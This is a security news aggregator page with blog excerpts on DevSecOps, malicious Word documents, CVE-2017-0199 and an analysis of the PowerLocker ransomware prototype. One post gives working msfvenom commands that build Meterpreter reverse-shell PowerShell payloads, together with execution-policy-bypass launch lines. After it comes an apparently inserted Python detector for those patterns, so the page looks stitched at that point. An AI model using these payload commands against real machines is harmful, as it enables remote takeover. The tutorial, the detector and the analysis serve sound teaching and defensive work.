Feed aggregator

about

Room362.com - 48 min 8 sec ago
Mubix “Rob” Fuller Rob has over 11 years of experience covering all facets of information security. He has been behind the lines helping to design, build, and defend the US Marine Corps, US Senate, and Pentagon networks - as well as performing penetration tests and Red Team assessments against those same networks. More recently, Rob has performed numerous successful Red Team assessments against commercial Fortune 50 companies representing some of the best defensive teams in the industry.
Categories: Security Posts

Infocon: green

ISC Stormcast For Friday, August 18th 2017 https://isc.sans.edu/podcastdetail.html?id=5632
Categories: Security Posts

ISC Stormcast For Friday, August 18th 2017 https://isc.sans.edu/podcastdetail.html?id=5632, (Fri, Aug 18th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

In-Directo: YouTuber channels broadcast PPV football matches via Live Streaming

Un informático en el lado del mal - Thu, 2017/08/17 - 19:28
Yesterday I didn't have the energy left to watch the second leg of the Spanish Super Cup. I watched only a few minutes, and the hectic life I'm leading in Paris had me collapsing with the laptop on my chest. Still, I had time to discover how easy it is for anyone to access live broadcast content, such as a PPV football match, through Google's services.
Figure 1: In-Directo: YouTuber channels broadcast PPV football matches via Live Streaming
A while back I left you a post that generated quite a bit of controversy in some places, about how easy it was to find pirated films on YouTube and how Google's systems were not working that well at detecting pirated content, producing side effects that were, to say the least, "curious".
In this case, when football rights have an exorbitant acquisition cost through the content distribution platforms, such as pay TV, it is striking how simple it is for anyone to access almost any match through Google and YouTube.
Figure 2: Matches that started at 19:00 on Europa League PPV
Right now, while I wait to finish my trip, I did a small experiment, waiting for the 19:00 Europa League matches to start. On the web, you can see that the content of these matches is PPV (Pay Per View).
Figure 3: D. Zagreb vs Skënderbeu
Just go to Google and search for "recent" videos with Live Streaming of the match you want. As we can see, there are already several channels waiting to broadcast live the match we want to watch. Many are just videos whose description takes you to web services of dubious legality and don't actually broadcast the match on YouTube.
Figure 4: Channels that "supposedly" broadcast PPV football live from YouTube
But among them, there are some that do broadcast it, and when the time comes, the match starts on the YouTube channel, as announced, and can be watched.
Figure 5: The match live via YouTube, despite being PPV
My experience from testing says that sometimes, around 20 minutes in or so, claims appear from the content owner, who has to be proactively searching for them on these platforms that offer video Live Streaming. But by repeating the process, new channels appear that are ready for when the first ones fall.
The question left hanging is the same as with Internet services that store pirated content. Should they do more? Should it be the content owners who complain to the platforms? Can this be automated in a better way than reporting the broadcast of pirated content on Live Streaming services channel by channel? Can more be done?
Saludos Malignos!

PS: This happens on other platforms that broadcast Live Streaming Video, although YouTube and Google were used for the example.
Categories: Security Posts

Don't Be AppSec 'Helicopter Parents'

Zero in a bit - Thu, 2017/08/17 - 16:55
Roles shifting can be disconcerting. Having a clear role and understanding your responsibilities and tasks is comforting. But getting too comfortable can be dangerous. Take parenting, for example. Parents wouldn’t be doing their kids any favors by continuing to feed and dress them as if they were 4 when they’re 10. As children age, they start to do these basic tasks on their own, and the parent role shifts to one of enabler – helping and guiding children as they do these tasks for themselves. This shift leaves the parents free to focus on more “value-add” type activities, such as homework and social activities.

Similarly, most people find their role in the workplace changing as their career advances. For instance, the shift from individual contributor to manager accompanies a shift from doing to enabling. Just as parents stop doing everything for their kids and start enabling kids to do things for themselves, managers need to stop doing all the work and start enabling and guiding their team to do the work. This is not an easy transition, and one many never fully make (think “helicopter parenting,” empty nesters feeling lost and depressed, or micromanaging bosses). But in the end, not making it does more harm than good – in child rearing, the workplace … and even application security.

Security Role Change

With the shift to DevSecOps, security professionals are undergoing a shift in their role in the development process. Security’s role in AppSec is shifting from one of “do-er” to enabler. Just as kids growing and maturing changes the landscape and forces a shift in roles, changing and maturing software development is instigating a role shift as well. In this new landscape, the security team is no longer doing the security testing, but enabling developers to do the testing. And just as with raising children or managing a team, neglecting to embrace this shift will harm both the process and the individual.

Why the Shift?

With the number of applications exploding and the pace of development rapidly intensifying, traditional application security methods are no longer able to keep up. Security teams conducting their testing after the development process, then sending results back to the dev teams to address them, is simply not feasible in today’s fast-paced environment. Today, security needs to shift left and be addressed early and often as part of the development process.

Modern application security programs feature centralized governance by security, but testing and fixing are owned by development in an automated fashion throughout the build process. In this approach, security owns setting policies, tracking KPIs and providing security coaching to developers. In addition, security is responsible for providing developers with support in integrating scalable tools like Veracode into their SDLC. Developers own testing applications in their development environment, fixing flaws to pass policy and continuing to build code. In this process, security-related defects are just another bug during the build process, and developers have the tools and guidance needed to fix them. At the same time, security can govern the program to make sure KPIs and policies are met.

DevSecOps is going to be a disruptive force for security professionals. But it’s also a positive shift, creating an opportunity to greatly improve application security, and allowing the security team to focus on more value-added tasks and initiatives like governance and coaching. As with most life changes, the key is to understand the change and its implications for your role and be prepared to not only survive it, but thrive in it. Change is never easy, but failing to adapt will inevitably hold you and those around you back. Get best practices for working in this new development environment in The Security Professional’s Role in a DevSecOps World.
Categories: Security Posts

[SANS ISC] Maldoc with auto-updated link

/dev/random - Thu, 2017/08/17 - 12:53
I published the following diary on isc.sans.org: “Maldoc with auto-updated link“. Yesterday, while hunting, I found another malicious document that (ab)used a Microsoft Word feature: auto-update of links. This feature is enabled by default for any newly created document (that was the case for my Word 2016 version). If you add links to external resources like URLs, Word will automatically update them without any warning or prompt… [Read more] [The post [SANS ISC] Maldoc with auto-updated link was first published on /dev/random]
Categories: Security Posts

Generating PowerShell Scripts With MSFVenom On Windows

Didier Stevens - Wed, 2017/08/16 - 22:46
To generate a PowerShell script with msfvenom on Windows, use the command “msfvenom.bat --payload windows/x64/meterpreter_reverse_http --format psh --out meterpreter-64.ps1 LHOST=127.0.0.1”:

The payload windows/x64/meterpreter_reverse_http is the Meterpreter payload for 64-bit Windows. Format psh is the format to use to generate a PowerShell script that will execute the payload (formats ps1 and powershell are transform formats; they do not generate a script that executes the payload).

A 32-bit payload is generated with this command: “msfvenom.bat --payload windows/meterpreter_reverse_http --format psh --out meterpreter-32.ps1 LHOST=127.0.0.1”:

Just as I showed in my post for .exe payloads, we start a handler like this:

Now we need to execute the PowerShell scripts. Just executing “powershell.exe -File meterpreter-64.ps1” will not work: by default, .ps1 files are not executed. We can execute them by bypassing the policy: “powershell.exe -ExecutionPolicy Bypass -File meterpreter-64.ps1”:

In this example, 948 is the handle to the thread created by CreateThread when the payload is executed. But back in the Metasploit console, you will not see a connection. That’s because the PowerShell process terminates before the Meterpreter payload can fully execute: powershell.exe executes the script, which loads the Meterpreter payload into the powershell process, and then powershell.exe exits, i.e. the powershell process is terminated and thus the Meterpreter payload too.

To give the Meterpreter payload the time to establish a connection, the powershell process must remain alive. We can do this by preventing powershell.exe from exiting with option -NoExit:

Now we get a connection:

This example was for a 64-bit payload on a 64-bit Windows machine. The same command is used to execute the 32-bit payload on a 32-bit Windows machine (except for the filename, which is meterpreter-32.ps1 in our example).

To execute the 32-bit payload on a 64-bit Windows machine, we need to start 32-bit PowerShell, like this: “c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoExit -File meterpreter-32.ps1”. This gives us 2 sessions:
Categories: Security Posts
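The invocation pattern the post above walks through (an execution-policy bypass, -NoExit to keep the host process alive, a .ps1 passed via -File, and the SysWOW64 copy of powershell.exe) is exactly what a process-creation detection can key on. The following is an added defensive example, not code from Didier's post: the key=value log format and the sample events are constructed, and the alias table plus prefix matching is a simplified model of how powershell.exe resolves abbreviated parameters such as -ep or -noe.

```python
import re

# Canonical powershell.exe parameters with their documented short aliases.
# Windows PowerShell also accepts any unambiguous prefix (e.g. -exec for
# -ExecutionPolicy); resolve_param() approximates that with prefix matching.
PARAMS = {
    "executionpolicy": ("ex", "ep"),
    "noexit": ("noe",),
    "noprofile": ("nop",),
    "noninteractive": ("noni",),
    "file": ("f",),
    "command": ("c",),
}

# Constructed process-creation events (not real logs); three of them mirror
# the invocations discussed in the post, the last one is benign admin use.
SAMPLE_LOG = r"""
ts=2017-08-16T22:40:11 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -File meterpreter-64.ps1"
ts=2017-08-16T22:41:03 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -ExecutionPolicy Bypass -NoExit -File meterpreter-64.ps1"
ts=2017-08-16T22:45:27 image="C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" cmdline="c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noe -f meterpreter-32.ps1"
ts=2017-08-16T22:50:00 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell.exe -NoProfile -Command Get-Process"
"""
LOG_RE = re.compile(r'ts=(\S+) image="([^"]*)" cmdline="([^"]*)"')
ARG_RE = re.compile(r'"[^"]*"|\S+')  # keep quoted paths as one token

def resolve_param(token):
    """Map '-ExecutionPolicy', '-ep' or '-exec' to a canonical name, else None."""
    name = token.lstrip("-").lower()
    for canon, aliases in PARAMS.items():
        if name == canon or name in aliases:
            return canon
    hits = [c for c in PARAMS if c.startswith(name)]
    return hits[0] if len(hits) == 1 else None  # '-no' is ambiguous -> None

def analyse_cmdline(image, cmdline):
    """Return the findings for one process-creation event, in argument order."""
    findings = []
    if "syswow64" in image.lower():
        findings.append("wow64_powershell")  # 32-bit host on a 64-bit system
    args = [t.strip('"') for t in ARG_RE.findall(cmdline)][1:]  # drop argv[0]
    for i, tok in enumerate(args):
        if not tok.startswith("-"):
            continue  # a parameter value, e.g. "Bypass" or the script name
        param = resolve_param(tok)
        nxt = args[i + 1].lower() if i + 1 < len(args) else ""
        if param == "executionpolicy" and nxt in ("bypass", "unrestricted"):
            findings.append("policy_bypass")
        elif param == "noexit":
            findings.append("noexit")  # keeps the host alive for a payload
        elif param == "file" and nxt.endswith(".ps1"):
            findings.append("script_file")
    return findings

def scan_log(text):
    """Return (timestamp, findings) for every event that raised a finding."""
    events = (m.groups() for m in LOG_RE.finditer(text))
    hits = ((ts, analyse_cmdline(img, cmd)) for ts, img, cmd in events)
    return [(ts, f) for ts, f in hits if f]
```

Run against SAMPLE_LOG, the benign -NoProfile -Command event produces nothing, while the SysWOW64 event is flagged even though every parameter was abbreviated.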

LaCon2k17 Call for Pulpos

48Bits Blog - Sat, 2017/08/12 - 10:32
We are proud to present the call for papers for LaCon 2017! Get your papers in now. We are accepting short talks of 30min and long talks of ~1h. [when] conf will be held from the 22nd to the 24th of Sept 2017 [where] undisclosed location [who] a bunch of crazy bastards [topics] topics include:
  • h/p/v/c/e …
  • satellites, antennas and radioactive crap
  • cryptocurrencies
  • knitting
  • radare3, radare2 talks won’t be accepted this year, for radare2 related topics consider attending r2con
  • cats
  • 8===========D
[submit] submit your talk proposals to lacon2k17.org@lists.48bits.com [gpgkey] gpg --keyserver pgp.mit.edu --recv-key 2BE9CA85
Categories: Security Posts

Join Fortinet at HPE Discover 2017!

Fortinet FortiGuard Blog - Mon, 2017/06/05 - 17:22
Fortinet is a Gold sponsor at Discover 2017, and will showcase several important security innovations to help you stay ahead of cyber threats. Join Fortinet at booth 231 while you’re at Discover 2017 to see a demo of the Fortinet Security Fabric in action! We’ll also have technical experts on hand to discuss any security needs you ma A key focus area for many attendees will be cybersecurity, given the challenges they face from today’s sophisticated and rapidly evolving threats. The isolated, proprietary security devices most organizations...
Categories: Security Posts

Governmental Entities Bringing Financial Cybersecurity to Center Stage

Fortinet FortiGuard Blog - Mon, 2017/06/05 - 17:20
By now, it’s no secret that cybercriminals have targeted, and continue to target, the financial services industry with advanced attacks that are designed to steal or otherwise jeopardize valuable data. As a result, many organizations have taken at least some initial steps to better secure their networks and the information that lives within them. In fact, according to Duff & Phelps’ “Global Regulatory Outlook,” 86 percent of professionals in the financial services industry say their companies have plans to put more...
Categories: Security Posts

An Inside Look at CVE-2017-0199 – HTA and Scriptlet File Handler Vulnerability

Fortinet FortiGuard Blog - Mon, 2017/06/05 - 03:52
FortiGuard Labs recently came across a new strain of samples exploiting the CVE-2017-0199 vulnerability. This vulnerability was fixed by Microsoft and the patch was released in April 2017. Due to its simplicity, it can be easily exploited by attackers. It has also been found in the wild by other vendors. We have also blogged about some samples recently found in spear phishing attacks. While there are plenty of articles discussing this vulnerability, most of them are intended for technical readers and primarily focus on how to create proof-of-concept...
Categories: Security Posts

Support my videos on Patreon!

Niels Provos - Sun, 2017/05/28 - 01:18

Add your support on Patreon to help me create more videos. Your support will help with materials, rent as well as other equipment, e.g. cameras, lights, software, etc. It is not required but appreciated. Due to time constraints I can make no promises on how often I will be able to publish new videos but my plan is to continue producing videos as long as people find them interesting.
Categories: Security Posts

A Scheme to Encrypt the Entire Web Is Actually Working

Wired: Threat Level - Thu, 2016/04/14 - 13:00
The non-profit certificate authority Let's Encrypt is enabling a sea change toward HTTPS encryption online. The post A Scheme to Encrypt the Entire Web Is Actually Working appeared first on WIRED.
Categories: Security Posts

Matthew Keys Sentenced to Two Years for Aiding Anonymous

Wired: Threat Level - Wed, 2016/04/13 - 23:30
The former Tribune Company employee was convicted of giving Anonymous information that helped hackers access an LA Times server and alter a headline. The post Matthew Keys Sentenced to Two Years for Aiding Anonymous appeared first on WIRED.
Categories: Security Posts

Hacker Lexicon: What Are White Hat, Gray Hat, and Black Hat Hackers?

Wired: Threat Level - Wed, 2016/04/13 - 23:03
Here's how to distinguish the colors of the hacker rainbow. The post Hacker Lexicon: What Are White Hat, Gray Hat, and Black Hat Hackers? appeared first on WIRED.
Categories: Security Posts

PowerLocker

PandaLabs - Wed, 2014/03/05 - 10:53
PowerLocker, also called PrisonLocker, is a new family of ransomware which, in addition to encrypting files on the victim’s computer (as with other such malware), threatens to block users’ computers until they pay a ransom (like the ‘Police virus’). Although the idea of combining the two techniques may have caused more than a few sleepless nights, in this case the malware is just a prototype. During its development, the malware creator has been posting on blogs and forums describing the progress and explaining the different techniques included in the code.

The malware creator’s message on pastebin

In this post, for example, the creator describes how PowerLocker is a ransomware written in C/C++ which encrypts files on infected computers and locks the screen, asking for a ransom. The malware encrypts the files, as is typical of this type of malware, using Blowfish as the encryption algorithm with a unique key for each encrypted file. It then protects each of these per-file keys with an RSA-2048 public/private key pair, so only the holder of the private key can decrypt all the files. Also, according to the creator, PowerLocker uses anti-debugging, anti-sandbox and anti-VM features, as well as disabling tools like the task manager, registry editor or the command line window.

However, all the publicity surrounding PowerLocker that the creator generated across forums and blogs before releasing it led to his arrest in Florida, USA. Consequently, today there is no definitive version of this malware and there is no evidence that it is in the wild. Nevertheless, we still feel it’s worth analyzing the current version of PowerLocker, as someone else could be in possession of the source code or even a later version.

PowerLocker analysis

The first thing PowerLocker does is check whether two files with RSA keys have already been created, and if not, it generates the public and private key in two files on the disk (pubkey.bin and privkey.bin). Unlike other ransomware specimens, which use the Windows CryptoAPI service, PowerLocker uses the OpenSSL library for generating keys and encrypting files.

Once it has the keys, PowerLocker runs a recursive search of directories looking for files to encrypt, excluding (not very effectively) files with any of the file names used by the malware: privkey.bin, pubkey.bin, countdown.txt, cryptedcount.txt. It also avoids $recycle.bin, .rans, .exe, .dll, .ini, .vxd or .drv files to prevent causing irreparable damage to the computer. The creator has, however, forgotten to exclude certain extensions corresponding to files delicate enough to affect the functionality of the system, such as .sys files. This means that any computer infected with PowerLocker would be unable to reboot.

Moreover, in this version it is possible to use a parameter to control whether the ransomware encrypts or decrypts files using the pubkey.bin and privkey.bin keys generated when it was first run. This version does not include the screen lock feature described by the creator, although it displays a console with debug messages, names of the files to encrypt/decrypt, etc., and asks you to press a key before each encryption or decryption.

Conclusions

At present, there is only a half-finished version of PowerLocker which could practically be labelled harmless, and which lacks many of the most important features that the creator has described on the forums and blogs, such as anti-debugging, screen locking, etc. Despite it not being fully functional, we would recommend having a system for backing up critical files, not just to offer assurance in the event of hardware problems, but also to mitigate the damage of these types of malware infections. Also bear in mind that if you don’t have a backup system and your system is infected, we certainly do not recommend paying the ransom, as this only serves to encourage the perpetrators of such crimes.

PowerLocker analysis performed by Javier Vicente
Categories: Security Posts

April 2013 Super Tuesday

IBM X-Force 2012 Annual Trend & Risk report has been released!